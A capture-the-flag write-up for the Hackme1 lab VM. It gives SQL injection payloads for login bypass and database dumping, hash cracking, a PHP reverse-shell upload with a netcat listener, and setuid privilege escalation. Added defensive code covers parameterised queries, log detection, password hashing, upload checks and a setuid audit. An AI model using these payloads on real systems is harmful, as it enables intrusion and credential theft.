# Hackme1

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/hackme1 192.168.1.109
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 19:15 EDT
Nmap scan report for 192.168.1.109
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
|   256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_  256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:BA:01:E1 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds

```

### Dirb

```
dirb http://192.168.1.109/
```

```
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat May 23 19:18:32 2020
URL_BASE: http://192.168.1.109/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.109/ ----
+ http://192.168.1.109/index.php (CODE:200|SIZE:100)
+ http://192.168.1.109/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.1.109/uploads/

---- Entering directory: http://192.168.1.109/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat May 23 19:18:38 2020
DOWNLOADED: 4612 - FOUND: 2
```

Let's open the IP in a web browser.

![](/files/-M82p0AnAowCXtED5_Kg)

Got a login form.

Then I click "Sign up now".

![](/files/-M82rN8uruxafeOHpjVa)

After creating an account and logging in:

![](/files/-M82rUVbyV76nXJrC4pM)

## Exploitation

### SQL injection

I tried a few SQL injection payloads and got a successful login bypass with this one:

```
admin' or '1'='1'#
```
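To show why that payload works and what closes the hole, here is an added example (my own code, not the VM's PHP or anything from the original write-up). It rebuilds the login check twice on an in-memory SQLite table with the column names seen in this write-up (`user`, `pasword`, both assumed for the demo with placeholder passwords): once by string formatting, once with a parameterised query. SQLite does not understand MySQL's `#` comment, so the payload variant here ends with `-- ` instead; the effect is the same.

```python
import sqlite3

# Constructed in-memory schema that mirrors the column names seen in the
# write-up (user, pasword); the VM's real schema and data are not reproduced.
# Plaintext placeholder passwords are used only so the comparison is visible.
SAMPLE_USERS = [
    ("superadmin", "placeholder-pass-1"),
    ("Anonymous", "placeholder-pass-2"),
]


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pasword TEXT)")
    conn.executemany("INSERT INTO users (user, pasword) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, user: str, password: str):
    """Builds the query by string formatting: the input becomes SQL syntax."""
    sql = f"SELECT user FROM users WHERE user = '{user}' AND pasword = '{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, user: str, password: str):
    """Parameterised query: the driver binds the input as a value, never as SQL."""
    sql = "SELECT user FROM users WHERE user = ? AND pasword = ?"
    row = conn.execute(sql, (user, password)).fetchone()
    return row[0] if row else None


# The write-up's payload ends with MySQL's '#' comment; SQLite has no '#'
# comment, so this variant terminates the rest of the statement with '-- '.
PAYLOAD = "admin' or '1'='1'-- "


def demo() -> dict:
    conn = build_db()
    return {
        # The tautology makes WHERE true for every row: the first user comes back
        "vulnerable": login_vulnerable(conn, PAYLOAD, "anything"),
        # The same text is looked up literally as a username: no such user
        "safe": login_safe(conn, PAYLOAD, "anything"),
        # Legitimate credentials still work through the safe path
        "legit": login_safe(conn, "superadmin", "placeholder-pass-1"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

The vulnerable path hands back `superadmin` for the payload because the injected `or '1'='1'` is true for every row and the comment swallows the password check; the parameterised path treats the whole string as one (non-existent) username. Every query the write-up sends later (the `UNION SELECT` probes) is neutralised the same way once the input is bound as a parameter.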

Then I open Burp, intercept the welcome.php request and send it to Repeater.

Then I tried a UNION SELECT to test how many columns the original query returns:

```
Anonymous' UNION SELECT 1,2,3#
```

![](/files/-M82s3TEOA8MrlktP5q2)

The query returned a result, so the original query has 3 columns.

Then I use this query to extract all the database names:

```
Anonymous' UNION SELECT GROUP_CONCAT(SCHEMA_NAME),2,3 FROM information_schema.schemata#
```

![](/files/-M82sUg6Z95fHvVuuVBm)

We got a few databases here; let's see what is inside.

After going through every database, I found that the one with interesting tables is `webapphacking`, using this query:

```
Anonymous' UNION SELECT GROUP_CONCAT(TABLE_NAME),2,3 FROM information_schema.tables WHERE table_schema = "webapphacking"#
```

![](/files/-M82t9aLhHpYSls5uOy9)

2 tables were found: `books` and `users`.

After that, I extract the column names of both tables together using this query:

```
Anonymous' UNION SELECT GROUP_CONCAT(TABLE_NAME, ':', COLUMN_NAME),2,3 FROM information_schema.columns WHERE table_schema = "webapphacking"#
```

![](/files/-M82tk7wCmDyEdP8at-e)

Got a lot of output; let's copy it and put it inside a file.

Then we can use `sed` to replace each comma with a newline; the command looks like this:

```
cat tables | sed 's/,/\n/g'
```

![](/files/-M82uHjZSBQt4hApLRtH)

Then we can pick out each column name; the most interesting ones are `user` and `pasword` (sic, as the schema spells it):

```
Anonymous' UNION SELECT GROUP_CONCAT(user, ':',pasword),2,3 FROM webapphacking.users#
```

![](/files/-M82wjUax0L0mfTdsaNO)

Then we got a very long result from the query; copy it to a file and use `sed` again to split it properly.
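Every one of those probes went through the web server, so from the defender's side this whole enumeration is visible in the access log. Here is an added example (my code, not part of the original write-up) that parses Apache combined-format lines, URL-decodes the request path and flags the indicators used above: `UNION SELECT`, `information_schema`, quote tautologies and comment terminators. The log lines are constructed for the demo and encode the same probes shown in this write-up; one caveat is that a default access log records only the request line, so a payload sent in a POST body (as Burp Repeater may do) needs an application-level or WAF log to be seen.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Indicators matching the probes used in the write-up (UNION SELECT,
# information_schema lookups, quote tautologies, comment terminators).
SQLI_PATTERNS = [
    ("union_select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("schema_probe", re.compile(r"\binformation_schema\b", re.I)),
    ("tautology", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I)),
    ("comment_terminator", re.compile(r"(#|--\s|/\*)")),
]


def decode_path(path: str) -> str:
    # Decode twice: double-encoded input is a common way past naive filters.
    return unquote_plus(unquote_plus(path))


def analyze(lines):
    """Return one record per request that trips at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_path(m["path"])
        tags = [name for name, rx in SQLI_PATTERNS if rx.search(decoded)]
        if tags:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "path": decoded, "tags": tags})
    return hits


def offenders(hits) -> Counter:
    """How many flagged requests each client address produced."""
    return Counter(h["ip"] for h in hits)


# Constructed sample lines (not real logs from the VM); the query strings are
# URL-encoded versions of the probes shown in the write-up.
SAMPLE_LOG = [
    '192.168.1.50 - - [23/May/2020:19:30:01 -0400] "GET /welcome.php?search=Anonymous%27+UNION+SELECT+1%2C2%2C3%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [23/May/2020:19:30:07 -0400] "GET /welcome.php?search=Anonymous%27+UNION+SELECT+GROUP_CONCAT%28SCHEMA_NAME%29%2C2%2C3+FROM+information_schema.schemata%23 HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '192.168.1.77 - - [23/May/2020:19:31:15 -0400] "GET /welcome.php?search=harry+potter HTTP/1.1" 200 301 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [23/May/2020:19:32:40 -0400] "POST /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def demo():
    hits = analyze(SAMPLE_LOG)
    return hits, offenders(hits)


if __name__ == "__main__":
    hits, counts = demo()
    for h in hits:
        print(h["ip"], h["ts"], h["tags"], h["path"])
    print("flagged requests per client:", dict(counts))
```

Two of the four constructed lines are flagged, both from the same client, and the innocent search for `harry potter` is not. In practice the interesting signal is the burst: a normal user never sends `information_schema` in a search box, and several flagged requests from one address within a minute is what should page someone.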

### John

![](/files/-M82xP0YsdG0tAW1DD8S)

As we can see, these are all MD5 hashes, so we can put them into this [website](https://crackstation.net/) to crack them, because john is cracking way too slowly!

![](/files/-M830rZhRTqAv7Xvcoqn)
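The reason a lookup site answers instantly is that unsalted MD5 of a common password is a fixed value anyone can precompute. As an added example (my code, not from the write-up or the VM), here is what the application should have stored instead: a salted PBKDF2-HMAC-SHA256 hash with a real work factor, verified with a constant-time compare. The sample password and the 600,000-iteration figure (taken from the OWASP Password Storage Cheat Sheet at the time of writing) are the only assumptions.

```python
import base64
import hashlib
import hmac
import os
from typing import Optional

# Work factor for PBKDF2-HMAC-SHA256; the OWASP Password Storage Cheat Sheet
# recommends 600,000 iterations at the time of writing. Tune for your hardware.
ITERATIONS = 600_000


def legacy_md5(password: str) -> str:
    """What the write-up found in the users table: unsalted, fast, and therefore
    answerable from a precomputed table. Kept here only for comparison."""
    return hashlib.md5(password.encode(), usedforsecurity=False).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Salted, slow hash in a self-describing string: algo$iters$salt$digest."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    )


def verify_password(password: str, stored: str) -> bool:
    try:
        algo, iters, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False  # malformed record, never a match
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iters))
    # Constant-time comparison so a mismatch does not leak how many bytes agreed.
    return hmac.compare_digest(candidate, expected)


def demo() -> dict:
    pw = "Password1"  # constructed sample credential
    stored = hash_password(pw)
    return {
        # Two users with the same password share one MD5: crack once, reuse everywhere.
        "md5_identical_for_equal_passwords": legacy_md5(pw) == legacy_md5(pw),
        # A fresh salt per user makes equal passwords look unrelated at rest.
        "pbkdf2_differs_per_user": hash_password(pw) != stored,
        "verify_correct": verify_password(pw, stored),
        "verify_wrong": verify_password("Password2", stored),
        "verify_garbage": verify_password(pw, "not-a-hash"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Storing the iteration count inside the record is deliberate: when the work factor is raised later, old records still verify and can be re-hashed on the user's next successful login.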

Then we can log in with the `superadmin` account

![](/files/-M831cab-tCK-JV7OKQM)

Got a page that lets us upload a file.

### Reverse Shell

We can go to this [website](http://pentestmonkey.net/tools/web-shells/php-reverse-shell) and grab the PHP reverse shell file.

Then, we need to change the IP and the port inside the file.

![](/files/-M832AZeX-dnzyymD6vU)

After that, upload it to the server.

![](/files/-M832FRk7Bd72NN2uFPj)

Then, we go to the `/uploads/` directory that we discovered with `dirb` earlier.

First, we need to set up a listener on our machine:

Our machine:

```
nc -nlvp 4444
```

![](/files/-M832pcwv8MLKq2IBCmf)

As we can see, our file is there; click the reverseShell file.

![](/files/-M832xTdISuQbZdjEPti)
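The upload form accepted a `.php` file, kept its original name and dropped it into a listable directory where the web server executes scripts; that chain is what turns an upload into a shell. As an added example (my own code, not the VM's upload handler), here is the validation a file-upload endpoint should do: an extension allowlist, a check that the bytes match the declared type, a scan for script tags, and a random stored name. The allowlist, size limit and sample files are constructed for the demo. On the server side, the uploads directory should additionally be non-listable (`Options -Indexes` in Apache) and configured so the web server never runs scripts from it.

```python
import os
import secrets

# Allowlisted extensions and the leading bytes a genuine file of that type has.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
MAX_BYTES = 5 * 1024 * 1024  # 5 MiB, an assumed limit for this example


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason, stored_name). The stored name is random, so the
    uploader neither chooses it nor can predict the URL of the saved file."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop directory parts
    if len(data) > MAX_BYTES:
        return False, "file too large", None
    if "." not in base:
        return False, "no extension", None
    ext = base.rsplit(".", 1)[1].lower()
    if ext == "jpeg":
        ext = "jpg"
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed", None
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared type", None
    # Heuristic: an "image" carrying PHP open tags is not something to serve back.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded script tag", None
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"


# Constructed sample uploads (no real shell code; the PHP bodies are stubs).
SAMPLES = {
    "cat.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 64,
    "reverseShell.php": b"<?php /* stand-in for an uploaded script */ ?>",
    "holiday.jpg": b"<?php /* script renamed to look like an image */ ?>",
    "../../etc/evil.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 64,
}


def demo() -> dict:
    """Accepted flag and reason for each sample (stored names are random)."""
    return {name: validate_upload(name, data)[:2] for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, (accepted, reason) in demo().items():
        print(f"{name:22} -> {'accept' if accepted else 'reject'}: {reason}")
```

Note that the last sample is accepted: its directory components are discarded and it is stored under a random name, so the uploader's choice of path never reaches the filesystem. The check order matters too; the size limit runs before anything reads the content.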

## Privilege Escalation

Go to the `/home/legacy` directory and we can see a file called `touchmenot`.

Run the file and you will get root!

![](/files/-M834qnuzhWba_czCmOW)
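A root-owned setuid binary sitting in a user's home directory is exactly the kind of thing a periodic audit should catch before anyone has to "run the file". As an added example (my code, not from the write-up), here is a small setuid inventory that walks a tree, records every setuid regular file, marks ones in locations where that is rarely legitimate, and reports anything not present in a previously saved baseline. The list of unusual prefixes is an assumption for the demo; the `demo()` function builds its own temporary directory so the check can be run without touching a real system.

```python
import os
import stat
import tempfile

# Locations where a setuid binary is rarely legitimate; assumed list for this example.
UNUSUAL_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


def is_setuid(mode: int) -> bool:
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_setuid(root: str):
    """Walk root and return every regular file with the setuid bit set."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished; skip rather than abort the audit
            if is_setuid(st.st_mode):
                found.append({
                    "path": path,
                    "uid": st.st_uid,
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "unusual_location": path.startswith(UNUSUAL_PREFIXES),
                })
    return found


def new_since_baseline(found, baseline_paths):
    """Setuid files that a previously recorded, known-good inventory did not contain."""
    return [f for f in found if f["path"] not in baseline_paths]


def demo() -> dict:
    """Self-contained run in a temp dir: one setuid file, one plain file."""
    d = tempfile.mkdtemp(prefix="suid-audit-")
    suid = os.path.join(d, "demo_setuid")
    plain = os.path.join(d, "demo_plain")
    for p in (suid, plain):
        with open(p, "wb") as fh:
            fh.write(b"#!/bin/sh\nexit 0\n")
    os.chmod(suid, 0o4755)  # owner may set the setuid bit on their own file
    os.chmod(plain, 0o755)
    found = find_setuid(d)
    return {
        "found_paths": [f["path"] for f in found],
        "expected_path": suid,
        "new_vs_empty_baseline": len(new_since_baseline(found, set())),
        "new_vs_known_baseline": len(new_since_baseline(found, {suid})),
    }


if __name__ == "__main__":
    # Example usage against a real tree: python3 suid_audit.py (as root, for a full view)
    for entry in find_setuid("/"):
        flag = "UNUSUAL" if entry["unusual_location"] else ""
        print(entry["mode"], entry["uid"], entry["path"], flag)
```

Run it once on a clean build, save the paths as the baseline, and diff on a schedule; a new entry such as `/home/legacy/touchmenot` would show up both as new and as being in an unusual location.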

Congratulations!
